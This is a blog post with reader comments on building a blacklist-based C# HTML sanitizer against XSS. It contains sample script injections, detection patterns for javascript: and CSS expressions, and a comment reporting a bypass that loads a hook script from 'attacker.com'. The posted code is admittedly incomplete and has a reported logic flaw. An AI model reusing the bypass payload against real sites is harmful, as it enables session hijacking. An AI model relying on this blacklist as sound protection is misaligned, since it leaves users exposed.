.NET HTML Sanitation for rich HTML Input

Recently I was working on updating a legacy application to MVC 4 that included free form text input. When I set up the new site my initial approach was to not allow any rich HTML input, only simple text formatting that would respect a few simple HTML commands for bold, lists etc. and automatically handles line break processing for new lines and paragraphs. This is typical for what I do with most multi-line text input in my apps and it works very well with very little development effort involved.
Then the client sprung another note: Oh by the way we have a bunch of customers (real estate agents) who need to post complete HTML documents. Oh uh! There goes the simple theory. After some discussion and pleading on my part 😢 to try and avoid this type of raw HTML input because of potential XSS issues, the client decided to go ahead and allow raw HTML input anyway.
XSS
There have been lots of discussions on this subject on StackOverflow (and here and here), but after reading through some of the solutions I didn't really find anything that came even close to what I needed. Specifically we need to be able to allow just about any HTML markup, with the exception of script code. Remote CSS and images need to load, links need to work and so on. While the 'legit' HTML posted by these agents is basic in nature, it does span most of the full gamut of HTML (4). Most of the XSS prevention/sanitizer solutions I found were way too aggressive and rendered the posted output unusable, mostly because they tend to strip any externally loaded content.
In short I needed a custom solution. I thought the best solution to this would be to use an HTML parser - in this case the Html Agility Pack - and then to run through all the HTML markup provided and remove any of the blacklisted tags and a number of attributes that are prone to JavaScript injection.
There's much discussion on whether to use blacklists vs. whitelists in the discussions mentioned above, but I found that whitelists can make sense in simple scenarios where you might allow manual HTML input, but when you need to allow a larger array of HTML functionality a blacklist is probably easier to manage as the vast majority of elements and attributes could be allowed. Also white listing gets a bit more complex with HTML5 and the new proliferation of new HTML tags and most new tags generally don't affect XSS issues directly. Pure whitelisting based on elements and attributes also doesn't capture many edge cases (see some of the XSS cheat sheets listed below) so even with a white list, custom logic is still required to handle many of those edge cases.
The Microsoft Web Protection Library (AntiXSS)
My first thought was to check out the Microsoft AntiXSS library. Microsoft has an HTML encoding and sanitation library in the Microsoft Web Protection Library (formerly AntiXSS Library) on CodePlex, which provides stricter functions for whitelist encoding and sanitation. Initially I thought the Sanitizer class and its static members would do the trick for me, but I found that this library is way too restrictive for my needs. Specifically the Sanitizer class strips out images and links, which rendered the full HTML from our real estate clients completely useless. I didn't spend much time with it, but apparently I'm not alone in feeling this library is not really useful without some way to configure its operation.
To give you an example of what didn't work for me with the library here's a small and simple HTML fragment that includes script, img and anchor tags. I would expect the script to be stripped and everything else to be left intact. Here's the original HTML:
string value = "<b>Here</b> <script>alert('hello')</script> we go. Visit the " +
"<a href='http://west-wind.com'>West Wind</a> site. " +
"<img src='http://west-wind.com/images/new.gif' /> ";
and the code to sanitize it with the AntiXSS Sanitize class:
@Html.Raw(Microsoft.Security.Application.Sanitizer.GetSafeHtmlFragment(value))
This produced a not so useful sanitized string:
Here we go. Visit the West Wind site.
While it removed the <script> tag (good) it also removed the href from the link and the image tag altogether (bad). In some situations this might be useful, but for most tasks I doubt this is the desired behavior. While links can contain javascript: references and images can 'broadcast' information to a server, without configuration to tell the library what to restrict this becomes useless to me. I couldn't find any way to customize the white list, nor is there code available in this 'open source' library on CodePlex.
Using Html Agility Pack for HTML Parsing
The WPL library wasn't going to cut it. After doing a bit of research I decided the best approach for a custom solution would be to use an HTML parser and inspect the HTML fragment/document I'm trying to import. I've used the HTML Agility Pack before for a number of apps where I needed an HTML parser without requiring an instance of a full browser like the Internet Explorer Application object, which is inadequate in Web apps. In case you haven't checked out the Html Agility Pack before, it's a powerful HTML parser library that you can use from your .NET code. It provides a simple, parsable HTML DOM model over full HTML documents or HTML fragments that lets you walk through each of the elements in your document. If you've used the HTML or XML DOM in a browser before you'll feel right at home with the Agility Pack.
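To give you an idea of what working with the Agility Pack looks like, here's a minimal sketch (the input string is just an example) that parses a fragment and walks all of its element nodes - this is the same basic traversal the sanitizer below builds on. It requires the HtmlAgilityPack NuGet package:

```csharp
using System;
using HtmlAgilityPack;

class Demo
{
    static void Main()
    {
        var doc = new HtmlDocument();
        doc.LoadHtml("<div><b>Hello</b> <script>alert('x')</script></div>");

        // Descendants() walks the entire parsed tree depth-first
        foreach (HtmlNode node in doc.DocumentNode.Descendants())
        {
            if (node.NodeType == HtmlNodeType.Element)
                Console.WriteLine(node.Name);  // div, b, script
        }
    }
}
```

Note that the parser is tolerant of malformed HTML, which matters for sanitation: you want to inspect what a browser would actually render, not just well-formed input.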
Blacklist based HTML Parsing to strip XSS Code
For my purposes of HTML sanitation, the process involved is to walk the HTML document one element at a time and then check each element and attribute against a blacklist. There's quite a bit of argument about what's better: a whitelist of allowed items or a blacklist of denied items. While whitelists tend to be more secure, they also require a lot more configuration. In the case of HTML5 a whitelist could be very extensive. For what I need, I only want to ensure that no JavaScript is executed, so the blacklist includes the obvious <script> tag plus any tag that allows loading of external content, including <iframe>, <object>, <embed> and <link> etc. <form> is also excluded to avoid posting content to a different location. I also disallow <head> and <meta> tags in particular for my case, since I'm only allowing posting of HTML fragments. There is also some internal logic to exclude attributes that include references to JavaScript or CSS expressions.
The default tag blacklist reflects my use case, but is customizable and can be added to.
Here's my HtmlSanitizer implementation:
using System.Collections.Generic;
using System.IO;
using System.Xml;
using HtmlAgilityPack;

namespace Westwind.Web.Utilities
{
    public class HtmlSanitizer
    {
        public HashSet<string> BlackList = new HashSet<string>()
        {
            "script",
            "iframe",
            "form",
            "object",
            "embed",
            "link",
            "head",
            "meta"
        };

        /// <summary>
        /// Cleans up an HTML string and removes HTML tags in blacklist
        /// </summary>
        /// <param name="html"></param>
        /// <returns></returns>
        public static string SanitizeHtml(string html, params string[] blackList)
        {
            var sanitizer = new HtmlSanitizer();
            if (blackList != null && blackList.Length > 0)
            {
                sanitizer.BlackList.Clear();
                foreach (string item in blackList)
                    sanitizer.BlackList.Add(item);
            }
            return sanitizer.Sanitize(html);
        }

        /// <summary>
        /// Cleans up an HTML string by removing elements
        /// on the blacklist and all attributes that start
        /// with onXXX.
        /// </summary>
        /// <param name="html"></param>
        /// <returns></returns>
        public string Sanitize(string html)
        {
            var doc = new HtmlDocument();
            doc.LoadHtml(html);
            SanitizeHtmlNode(doc.DocumentNode);

            string output = null;

            // Use an XmlTextWriter to create self-closing tags
            using (StringWriter sw = new StringWriter())
            {
                XmlWriter writer = new XmlTextWriter(sw);
                doc.DocumentNode.WriteTo(writer);
                output = sw.ToString();

                // strip off XML doc header
                if (!string.IsNullOrEmpty(output))
                {
                    int at = output.IndexOf("?>");
                    output = output.Substring(at + 2);
                }
                writer.Close();
            }

            return output;
        }

        private void SanitizeHtmlNode(HtmlNode node)
        {
            if (node.NodeType == HtmlNodeType.Element)
            {
                // check for blacklist items and remove
                if (BlackList.Contains(node.Name))
                {
                    node.Remove();
                    return;
                }

                // remove CSS Expressions and embedded script links
                if (node.Name == "style")
                {
                    if (node.InnerHtml.Contains("expression") || node.InnerHtml.Contains("javascript:"))
                        node.ParentNode.RemoveChild(node);
                }

                // remove script attributes
                if (node.HasAttributes)
                {
                    for (int i = node.Attributes.Count - 1; i >= 0; i--)
                    {
                        HtmlAttribute currentAttribute = node.Attributes[i];
                        var attr = currentAttribute.Name.ToLower();
                        var val = currentAttribute.Value.ToLower();

                        // remove event handlers
                        if (attr.StartsWith("on"))
                            node.Attributes.Remove(currentAttribute);
                        // remove script links in any attribute
                        else if (val != null && val.Contains("javascript:"))
                            node.Attributes.Remove(currentAttribute);
                        // remove CSS Expressions
                        else if (attr == "style" &&
                                 val != null &&
                                 (val.Contains("expression") || val.Contains("javascript:") || val.Contains("vbscript:")))
                            node.Attributes.Remove(currentAttribute);
                    }
                }
            }

            // Look through child nodes recursively
            if (node.HasChildNodes)
            {
                for (int i = node.ChildNodes.Count - 1; i >= 0; i--)
                {
                    SanitizeHtmlNode(node.ChildNodes[i]);
                }
            }
        }
    }
}
Please note: Use this as a starting point only for your own parsing and review the code for your specific use case! If your needs are less lenient than mine were, you can make this much stricter by not allowing src and href attributes or CSS links if your HTML doesn't allow it. You can also check links for external URLs and disallow those - lots of options. The code is simple enough to extend to fit your use cases more specifically. It's also quite easy to make this code work using a whitelist approach if you want to go that route. The code above is semi-generic for allowing full-featured HTML fragments that only disallow script-related content.
The Sanitize method walks through each node of the document and then recursively drills into all of its children until the entire document has been traversed. Note that the code here uses an XmlTextWriter to write output - this is done to preserve XHTML style self-closing tags which are otherwise left as non-self-closing tags.
The sanitizer code scans for blacklist elements and removes those elements not allowed. Note that the blacklist is configurable either in the instance class as a property or in the static method via the string parameter list. Additionally the code goes through each element's attributes and looks for a host of rules gleaned from some of the XSS cheat sheets listed at the end of the post. Clearly there are a lot more XSS vulnerabilities, but a lot of them apply to ancient browsers (IE6 and versions of Netscape) - many of these glaring holes (like CSS expressions - WTF IE?) have been removed in modern browsers.
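Using the class is a single call. A few examples (the input variable `userHtml` is assumed to hold the posted HTML):

```csharp
// Static helper with the default blacklist
string clean = HtmlSanitizer.SanitizeHtml(userHtml);

// Override the blacklist entirely via the params list -
// here also stripping style tags
string stricter = HtmlSanitizer.SanitizeHtml(userHtml,
    "script", "iframe", "form", "object", "embed", "link",
    "head", "meta", "style");

// Or customize an instance and add to the default list
var sanitizer = new HtmlSanitizer();
sanitizer.BlackList.Add("applet");
string result = sanitizer.Sanitize(userHtml);
```

Typically you'd run this once when the content is saved, rather than on every render, so the stored HTML is already clean.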
What a Pain
To be honest this is NOT a piece of code that I wanted to write. I think building anything related to XSS is better left to people who have far more knowledge of the topic than I do. Unfortunately, I was unable to find a tool that worked even closely for me, or even provided a working base. For the project I was working on I had no choice, and I'm sharing the code here merely as a baseline to start with and potentially expand on for specific needs. It's sad that the Microsoft Web Protection Library is currently such a train wreck - this is really something that should come from Microsoft as the systems vendor, or possibly a third party that provides security tools.
Luckily for my application we are dealing with authenticated and validated users so the user base is fairly well known, and relatively small - this is not a wide open Internet application that's directly public facing. As I mentioned earlier in the post, if I had my way I would simply not allow this type of raw HTML input in the first place, and instead rely on a more controlled HTML input mechanism like MarkDown or even a good HTML Edit control that can provide some limits on what types of input are allowed. Alas in this case I was overridden and we had to go forward and allow any raw HTML posted.
Sometimes I really feel sad that it's come this far - how many good applications and tools have been thwarted by fear of XSS (or worse) attacks? So many things that could be done if we had a more secure browser experience and didn't have to deal with every little script twerp trying to hack into Web pages and obscure browser bugs. So much time wasted building secure apps, so much time wasted by others trying to hack apps… We're a funny species - no other species manages to waste as much time, effort and resources as we humans do 😃
Resources
The Voices of Reason
# re: .NET HTML Sanitation for rich HTML Input
Now about that web site...
# re: .NET HTML Sanitation for rich HTML Input
I don't have any code to support the theory, but I think it's doable.
A separate app or process to sandbox the HTML request and return the result. A mini firewall, if you will.
It would eliminate the need to check input or sanitize XSS.
Could be as simple as a Web Service with one method, or an HTTP handler maybe, the main idea being that it is isolated from the database and file system of the main application.
# re: .NET HTML Sanitation for rich HTML Input
It's a far more effective whitelist approach than the Microsoft version.
OWASP tend to be pretty good at what they do.
# re: .NET HTML Sanitation for rich HTML Input
https://github.com/mganss/HtmlSanitizer
P.S. Thank you for a completely pain-free commenting system!
# re: .NET HTML Sanitation for rich HTML Input
It works great with HTML text. But a problem exists with text copied from Microsoft Office documents, because it contains some strange encoding that you already know. Do you have any solution for this?
___________________Copied from MS Word__________________
<html xmlns:v=3D"urn:schemas-microsoft-com:vml" xmlns:o=3D"urn:schemas-micr=
osoft-com:office:office" xmlns:w=3D"urn:schemas-microsoft-com:office:word" =
xmlns:m=3D"http://schemas.microsoft.com/office/2004/12/omml" xmlns=3D"http:=
//www.w3.org/TR/REC-html40"><head>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3DWindows-1=
252"><meta name=3D"Generator" content=3D"Microsoft Word 12 (filtered medium=
)"><style><!--
/* Font Definitions */
@font-face
{font-family:"Cambria Math";
panose-1:2 4 5 3 5 4 6 3 2 4;}
@font-face
{font-family:Calibri;
panose-1:2 15 5 2 2 2 4 3 2 4;}
@font-face
{font-family:Verdana;
panose-1:2 11 6 4 3 5 4 4 2 4;}
/* Style Definitions */
p.MsoNormal, li.MsoNormal, div.MsoNormal
{margin:0cm;
margin-bottom:.0001pt;
font-size:11.0pt;
font-family:"Calibri","sans-serif";}
a:link, span.MsoHyperlink
{mso-style-priority:99;
color:blue;
text-decoration:underline;}
a:visited, span.MsoHyperlinkFollowed
{mso-style-priority:99;
color:purple;
text-decoration:underline;}
span.E-MailFormatvorlage17
{mso-style-type:personal-compose;
font-family:"Calibri","sans-serif";
color:windowtext;}
.MsoChpDefault
{mso-style-type:export-only;}
@page WordSection1
{size:612.0pt 792.0pt;
margin:70.85pt 70.85pt 2.0cm 70.85pt;}
div.WordSection1
{page:WordSection1;}
--></style><!--[if gte mso 9]><xml>
<o:shapedefaults v:ext=3D"edit" spidmax=3D"1026" />
</xml><![endif]--><!--[if gte mso 9]><xml>
<o:shapelayout v:ext=3D"edit">
<o:idmap v:ext=3D"edit" data=3D"1" />
</o:shapelayout></xml><![endif]--></head><body lang=3D"DE" link=3D"blue" vl=
ink=3D"purple"><div class=3D"WordSection1"><p class=3D"MsoNormal">
_________________________
Output using your sanitizer contains a lot of
# re: .NET HTML Sanitation for rich HTML Input
https://github.com/Vereyon/HtmlRuleSanitizer
Thanks for providing the original inspiration on the approach of sanitizing an HTML document!
# re: .NET HTML Sanitation for rich HTML Input
You are missing a couple of parentheses around the // Remove CSS Expressions part. The result is a potential null pointer exception, and the logic also seems slightly off compared to the comment. Suggested change (based on the GitHub code, which has similar issues):
// remove event handlers
if (attr.StartsWith("on"))
    node.Attributes.Remove(currentAttribute);
// Remove CSS Expressions
else if (attr == "style" && val != null && HasExpressionLinks(val))
    node.Attributes.Remove(currentAttribute);
// remove script links from all attributes
else if (val != null && HasScriptLinks(val))
    node.Attributes.Remove(currentAttribute);
# re: .NET HTML Sanitation for rich HTML Input
<script src="//ajax.googleapis.com/ajax/libs/jqueryui/1.10.4/jquery-ui.min.js"></script>
<script src="/scripts/myJavascript.js"></script>
Browser support is good (http://caniuse.com/contentsecuritypolicy) and you can combine it with an HTML sanitiser to prevent anything slipping through the cracks.
As HTML, JavaScript, CSS and other web technologies develop, there will always be ways to bypass sanitizers. See this answer too: http://security.stackexchange.com/a/49342/8340
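As a rough illustration of that idea (the exact policy value here is an assumption, not from this site's configuration), a Content-Security-Policy header that only allows scripts from the site itself and the Google CDN referenced above could be added in an ASP.NET web.config:

```xml
<!-- Hypothetical web.config fragment: restrict script sources to this
     site and the Google CDN; inline script is blocked by default -->
<system.webServer>
  <httpProtocol>
    <customHeaders>
      <add name="Content-Security-Policy"
           value="script-src 'self' https://ajax.googleapis.com" />
    </customHeaders>
  </httpProtocol>
</system.webServer>
```

With a policy like this in place, even a script tag that slips past the sanitizer won't execute unless it comes from an allowed origin.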
# re: .NET HTML Sanitation for rich HTML Input
<script src="attacker.com/beefhook.js"
Is allowed through (and the src attribute is doubled for some reason) with /> appended to the end to make it a valid tag.
# re: .NET HTML Sanitation for rich HTML Input
Markdown is mentioned at the end of the article, but that is not going to solve the sanitation issue. There are valid Markdown constructs that lead to dangerous HTML when rendered in a browser. In fact, here is a harmless example entered in Markdown and shown here in HTML:
Markdown is inherently unsafe and also requires server side sanitation on the output HTML. That would have prevented the above (harmless) link 😉
# re: .NET HTML Sanitation for rich HTML Input
@Grietver - that depends on the Markdown parser in use. Most Markdown parsers have options to disable script code or disallow HTML tags altogether.
# re: .NET HTML Sanitation for rich HTML Input
BTW, I'm not sure if it is the right way to go about it, but I fixed the "&nbsp;" issue with a string.Replace("&nbsp;"," ") after it ran through the sanitizer. That worked fine.
Anyway, thanks again.
# re: .NET HTML Sanitation for rich HTML Input
CQ doc = CQ.Create(html);
string selector = String.Join(",", BlackList);  // "iframe, form, ..."
// CsQuery uses the property indexer as a default method; it's identical
// to the "Select" method and functions like $(...)
doc[selector].Remove();
doc["style:contains('expression'),style:contains('javascript:')"].Remove();

For testing script attributes, there's no native jQuery way to evaluate an attribute name itself, so that part wouldn't be all that different: you would still have to look through everything to do it without enumerating all the possible "onxxx" values. I'd probably use LINQ and do something like this:
It would be more efficient to enumerate all the possible event attribute names, though, since CsQuery would be able to use the index to locate them. This probably would make very little difference when talking about the amount of content likely to be submitted through a form, but if you were processing big documents from a CMS or something, it could.
There is also an API for creating custom filter-type selectors as in jQuery, but doing this as a one-off in LINQ is easy enough.